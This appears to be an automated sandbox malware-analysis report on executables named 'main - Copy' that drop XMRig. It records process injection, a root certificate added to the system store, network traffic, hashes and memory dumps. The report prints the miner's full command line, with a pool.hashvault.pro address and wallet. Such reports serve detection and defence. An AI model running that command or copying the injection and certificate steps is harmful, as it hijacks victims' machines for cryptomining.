| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 692 wrote to memory of 3300 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 692 wrote to memory of 3300 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3300-16-0x00000191BD7A0000-0x00000191BD7C0000-memory.dmp
memory/3300-17-0x00000191BF0A0000-0x00000191BF0C0000-memory.dmp
memory/3300-18-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-21-0x00000191BF0E0000-0x00000191BF100000-memory.dmp
memory/3300-20-0x00000191BF0C0000-0x00000191BF0E0000-memory.dmp
memory/3300-19-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-22-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-23-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-24-0x00000191BF0C0000-0x00000191BF0E0000-memory.dmp
memory/3300-25-0x00000191BF0E0000-0x00000191BF100000-memory.dmp
memory/3300-26-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-27-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-28-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-29-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-30-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-31-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-32-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-33-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-34-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-35-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-36-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-37-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-38-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-39-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-40-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-41-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-42-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-43-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-44-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-45-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-46-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-47-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-48-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-49-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-50-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-51-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-52-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-53-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-54-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-55-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-56-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-57-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-58-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-59-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-60-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-61-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-62-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-63-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-64-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-65-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-66-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-67-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-68-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-69-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-70-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-71-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-72-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-73-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-74-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-75-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-76-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-77-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-78-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-79-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-80-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-81-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-82-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-83-0x00007FF723A50000-0x00007FF724553000-memory.dmp
memory/3300-84-0x00007FF723A50000-0x00007FF724553000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:02
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3984 wrote to memory of 1824 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3984 wrote to memory of 1824 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
